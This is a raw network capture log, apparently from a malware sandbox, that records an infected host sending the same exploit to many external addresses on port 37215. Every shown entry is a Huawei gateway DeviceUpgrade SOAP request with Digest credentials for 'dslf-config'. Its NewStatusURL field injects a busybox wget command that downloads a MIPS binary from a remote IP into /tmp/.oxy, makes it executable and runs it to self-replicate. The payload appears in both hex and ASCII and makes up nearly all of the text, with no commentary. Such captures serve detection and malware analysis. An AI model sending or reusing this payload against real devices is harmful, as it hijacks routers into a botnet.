                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  634192.168.2.1353328157.27.172.4637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335836887 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  635192.168.2.135804641.253.159.9037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335860014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  636192.168.2.135619641.104.22.12137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335876942 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  637192.168.2.1336186157.159.232.24837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335901976 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  638192.168.2.134620841.91.244.7337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335923910 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  639192.168.2.1357174197.14.126.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335944891 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  640192.168.2.1356390117.4.174.1437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335961103 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  641192.168.2.1334922119.116.182.15837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335983038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  642192.168.2.1337450157.66.147.21237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335999012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  643192.168.2.1347764108.17.44.24437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.336021900 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 